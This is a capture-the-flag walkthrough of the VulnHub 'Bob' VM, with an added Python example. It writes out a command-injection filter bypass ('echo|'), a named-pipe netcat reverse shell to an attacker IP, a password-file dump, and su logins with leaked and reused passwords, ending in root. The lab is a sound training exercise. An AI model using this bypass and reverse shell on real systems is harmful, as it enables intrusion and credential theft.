
Bob: 1.0.1 VulnHub CTF Penetration Test Notes

☕ 7 min · ✍️ IceKam

Introduction

Bob is my first CTF VM, so go easy on me if it isn't perfect.

The Milburg Highschool server has just been attacked. The IT staff have taken down their Windows server and are now setting up a Linux server running Debian.
The new, unfinished server may have a few weaknesses.

Description

Your goal is to get /

Hint: remember to look for hidden info/files.

Information gathering

$ nmap -sS 10.0.2.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 09:37 CST
Nmap scan report for 10.0.2.4
Host is up (0.000078s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:16:DC:1E (Oracle VirtualBox virtual NIC)

That gives us the target IP; only port 80 is open.

Scan

$ nikto -h http://10.0.2.4/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.4
+ Target Hostname:    10.0.2.4
+ Target Port:        80
+ Start Time:         2019-04-16 09:40:28 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 591, size: 5669af30ee8f1, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7919 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2019-04-16 09:41:39 (GMT8) (71 seconds)
-------------------

Running nikto straight away: robots.txt leaks three files, and dev_shell.php looks very promising.

There is also something that looks like a login page. Two ways forward: brute-force the login, or POST commands at the dev shell. Submitting commands through the dev shell works, with one twist: every command is prefixed with `echo|`, which is what gets the real command past the dev shell's command check. With that, /etc/passwd comes straight out:

echo|cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
rtkit:x:106:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:108:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
messagebus:x:109:112::/var/run/dbus:/bin/false
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:112:116:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:113:117:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:114:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:115:121::/var/lib/saned:/bin/false
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false

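The `echo|` trick and the password file are both worth a closer look, so here is an added example in Python. It is not code from the original post and not the VM's dev_shell.php (whose source the post never shows). The first part models the kind of filter that `echo|cat /etc/passwd` slips past: it is an assumption that the dev shell blacklists only the first whitespace-separated word of the command and then hands the whole string to a shell, and the word list is made up; next to it is a hardened handler that parses the input with shlex, allowlists the program (a made-up allowlist) and never involves a shell. The second part triages the dump above: which accounts have a real login shell, which are human accounts (Debian allocates UIDs from 1000), and what an admin left in the GECOS field. The passwd lines are a constructed subset copied from the dump above.

```python
# Added example for this write-up; not code from the original post and not
# the Bob VM's dev_shell.php (whose source the post never shows).
import re
import shlex

# --- 1. Why `echo|cat /etc/passwd` gets through ------------------------------
#
# ASSUMPTION: the dev shell rejects a command when its first whitespace-
# separated word is on a blacklist, then hands the whole string to a shell.
# That is the simplest filter consistent with the write-up, where every
# command is prefixed with `echo|`.  The word list below is made up.
BAD_WORDS = {"pwd", "ls", "nc", "netcat", "cat", "mknod"}


def blacklist_allows(command: str) -> bool:
    """Model of a first-word blacklist (assumed, see above)."""
    first_word = re.split(r"\s", command, maxsplit=1)[0]
    return first_word not in BAD_WORDS


def bypass(command: str) -> str:
    """The prefix the write-up uses: `echo|cat x` has the first word
    "echo|cat", which is not in BAD_WORDS, yet the shell still runs cat."""
    return "echo|" + command


# Hardened counterpart: parse the input like a shell would, accept only an
# allowlisted argv[0], and (in a real handler) exec argv without a shell.
ALLOWED_PROGRAMS = {"id", "whoami", "uptime"}  # made-up allowlist


def hardened_parse(command: str):
    """Return argv for an allowlisted program, or None.  Because the caller
    would exec argv directly (no shell), "echo|cat" is just a program name
    that does not exist, and '|', '<' and '>' carry no meaning at all."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None
    return argv


# --- 2. Triage of the /etc/passwd dump ---------------------------------------
#
# Constructed subset of the dump shown above (same lines, fewer of them).
PASSWD_DUMP = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/bin/false
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def interactive_accounts(passwd_text: str):
    """(user, uid, full_name, home, shell) for every account whose login
    shell is real, i.e. every account `su` could actually drop us into."""
    accounts = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:  # blank line or garbage
            continue
        user, _pw, uid, _gid, gecos, home, shell = fields
        if shell in NOLOGIN_SHELLS:
            continue
        accounts.append((user, int(uid), gecos.split(",")[0], home, shell))
    return accounts


def su_candidates(passwd_text: str, min_uid: int = 1000):
    """Human accounts with a real shell: the names worth trying passwords on."""
    return [a for a in interactive_accounts(passwd_text) if a[1] >= min_uid]


def gecos_hints(passwd_text: str):
    """Anything typed into the GECOS sub-fields after the full name; bob's
    'Not the smartest person' is exactly the kind of note to read."""
    hints = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        extras = [f for f in fields[4].split(",")[1:] if f]
        if extras:
            hints[fields[0]] = extras
    return hints


if __name__ == "__main__":
    # A leading space is another way past a first-word check in this model
    # (not something the write-up tried on the VM).
    for cmd in ("cat /etc/passwd", bypass("cat /etc/passwd"), " cat /etc/passwd"):
        print(f"{cmd!r:24} blacklist allows: {blacklist_allows(cmd)!s:5}"
              f" hardened argv: {hardened_parse(cmd)}")
    for user, uid, name, home, shell in su_candidates(PASSWD_DUMP):
        print(f"{user:14} uid={uid} {name!r} {home} {shell}")
    print(gecos_hints(PASSWD_DUMP))
```

The point of the hardened half is not a better word list: once the handler builds an argv itself and execs it without a shell, there is nothing for `|`, `<` or `>` to do, so the blacklist question goes away entirely.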
Reverse shell

www-data can write to /tmp, so we can hook a shell up to nc straight away. The first line runs on the attacker box; the other two go through dev_shell.php with the same `echo|` prefix. The FIFO is what closes the loop: nc writes whatever the attacker types into /tmp/icekam, /bin/sh reads its commands from that FIFO, and sh's output flows through the pipe into nc's stdin and back to the listener. This is the classic fallback for a netcat built without -e.

nc -lvp 4443    ## attacker box: local listener
echo|mknod /tmp/icekam p    ## target, via dev_shell.php: create a named pipe (FIFO)
echo|/bin/sh 0</tmp/icekam | /bin/nc 10.0.2.5 4443 1>/tmp/icekam   ## target, via dev_shell.php: reverse shell

Upgrading to bash

10.0.2.4: inverse host lookup failed: Unknown host
connect to [10.0.2.5] from (UNKNOWN) [10.0.2.4] 46400
python -c "import pty;pty.spawn('/bin/bash')"
www-data@Milburg-High:/var/www/html$ ls
ls
WIP.jpg        dev_shell.php.bak   lat_memo.html   robots.txt
about.html     dev_shell_back.png  login.html	   school_badge.png
contact.html   index.html	   news.html
dev_shell.php  index.html.bak	   passwords.html
www-data@Milburg-High:/var/www/html$

Neat: they actually set up privilege separation, so the shell only runs as www-data. Next step: privilege escalation.

Privilege escalation

Information gathering

There is a flag.txt in /, but obviously www-data cannot read it.

After some poking around I found the following:

www-data@Milburg-High:/home$ cd elliot
cd elliot
www-data@Milburg-High:/home/elliot$ ls
ls
Desktop    Downloads  Pictures	Templates  theadminisdumb.txt
Documents  Music      Public	Videos
www-data@Milburg-High:/home/elliot$ cat theadminisdumb.txt
cat theadminisdumb.txt
The admin is dumb,
In fact everyone in the IT dept is pretty bad but I can’t blame all of them the newbies Sebastian and James are quite new to managing a server so I can forgive them for that password file they made on the server. But the admin now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James now they do some dumb stuff but their new and this is just a high-school server who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that doesn’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much but he just yells at me and says I don’t know what i’m doing. Sebastian has noticed and I gave him some tips on better securing his account, I can’t say the same for his friend James who doesn’t care and made his password: Qwerty. To be honest James isn’t the worst bob is his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. it’s only a matter of time before it’s broken into so because of this I have changed my password to

theadminisdumb

I hope bob is fired after the future second breach because of his incompetence. I almost want to fix it myself but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired it’s a good time.
www-data@Milburg-High:/home/elliot$ 

So jc's password is Qwerty (and, per the same note, elliot changed his to theadminisdumb).

Let's try logging in:

www-data@Milburg-High:/home$ su jc
su jc
Password: Qwerty

jc@Milburg-High:/home$ id
id
uid=1002(jc) gid=1002(jc) groups=1002(jc),100(users)
jc@Milburg-High:/home$ 

That account works, but jc has no permission on flag.txt either.

A second account

jc@Milburg-High:/home/bob$ ls -la
ls -la
total 172
drwxr-xr-x 18 bob  bob   4096 Mar  8  2018 .
drwxr-xr-x  6 root root  4096 Mar  4  2018 ..
-rw-------  1 bob  bob   6403 Mar  8  2018 .bash_history
-rw-r--r--  1 bob  bob    220 Feb 21  2018 .bash_logout
-rw-r--r--  1 bob  bob   3548 Mar  5  2018 .bashrc
drwxr-xr-x  7 bob  bob   4096 Feb 21  2018 .cache
drwx------  8 bob  bob   4096 Feb 27  2018 .config
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Desktop
-rw-r--r--  1 bob  bob     55 Feb 21  2018 .dmrc
drwxr-xr-x  3 bob  bob   4096 Mar  5  2018 Documents
drwxr-xr-x  3 bob  bob   4096 Mar  8  2018 Downloads
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 .ftp
drwx------  3 bob  bob   4096 Mar  5  2018 .gnupg
-rw-------  1 bob  bob   1980 Mar  8  2018 .ICEauthority
drwxr-xr-x  3 bob  bob   4096 Feb 21  2018 .local
drwx------  4 bob  bob   4096 Feb 21  2018 .mozilla
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Music
drwxr-xr-x  2 bob  bob   4096 Mar  4  2018 .nano
-rw-r--r--  1 bob  bob     72 Mar  5  2018 .old_passwordfile.html
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Pictures
-rw-r--r--  1 bob  bob    675 Feb 21  2018 .profile
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Public
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Templates
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Videos
drwx------  2 bob  bob   4096 Mar  5  2018 .vnc
-rw-------  1 bob  bob    214 Mar  8  2018 .Xauthority
-rw-r--r--  1 bob  bob  25211 Mar  8  2018 .xfce4-session.verbose-log
-rw-r--r--  1 bob  bob  27563 Mar  7  2018 .xfce4-session.verbose-log.last
-rw-------  1 bob  bob   3672 Mar  8  2018 .xsession-errors
-rw-------  1 bob  bob   2866 Mar  7  2018 .xsession-errors.old
jc@Milburg-High:/home/bob$ ls
ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
jc@Milburg-High:/home/bob$ cd Documents
cd Documents
jc@Milburg-High:/home/bob/Documents$ ls -la
ls -la
total 20
drwxr-xr-x  3 bob bob 4096 Mar  5  2018 .
drwxr-xr-x 18 bob bob 4096 Mar  8  2018 ..
-rw-r--r--  1 bob bob   91 Mar  5  2018 login.txt.gpg
drwxr-xr-x  3 bob bob 4096 Mar  5  2018 Secret
-rw-r--r--  1 bob bob  300 Mar  4  2018 staff.txt
jc@Milburg-High:/home/bob/Documents$ gpg –batch –passphrase HARPOCRATES -d login.txt.gpg bob:b0bcat_
<passphrase HARPOCRATES -d login.txt.gpg bob:b0bcat_
gpg: keybox '/home/jc/.gnupg/pubring.kbx' created
gpg: WARNING: no command supplied.  Trying to guess what you mean ...
usage: gpg [options] [filename]

After all that poking around, /home/bob/Documents turns out to hold login.txt.gpg, so the next step is to decrypt it with gpg. Note what happened in the transcript above: the dashes in the pasted command were not plain ASCII hyphens, so gpg treated the options as file names, complained that no command was supplied and printed its usage. The working invocation is

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

(the post does not record where the passphrase HARPOCRATES was found; on GnuPG 2.1 and later, `--passphrase` is only honored together with `--batch`, and some builds additionally need `--pinentry-mode loopback`).

Decrypting gives bob's credentials, bob:b0bcat_. While trying them out I found that the root password is the same as bob's.

Flag

bob@Milburg-High:/$ su
su
Password: b0bcat_ 

root@Milburg-High:/# cd /
cd /
root@Milburg-High:/# ls
ls
bin   flag.txt	      lib	  mnt	run   tmp      vmlinuz.old
boot  home	      lib64	  opt	sbin  usr
dev   initrd.img      lost+found  proc	srv   var
etc   initrd.img.old  media	  root	sys   vmlinuz
root@Milburg-High:/# cat flag.txt
cat flag.txt
CONGRATS ON GAINING ROOT

        .-.
       (   )
        |~|       _.--._
        |~|~:'--~'      |
        | | :   #root   |
        | | :     _.--._|
        |~|~`'--~'
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
   _____|_|_________ Thanks for playing ~c0rruptedb1t

Wrap-up

This box is fairly close to a real-world environment; what it mainly tests is information gathering.

Author: IceKam (tea-tasting "expert", low-end word-pusher).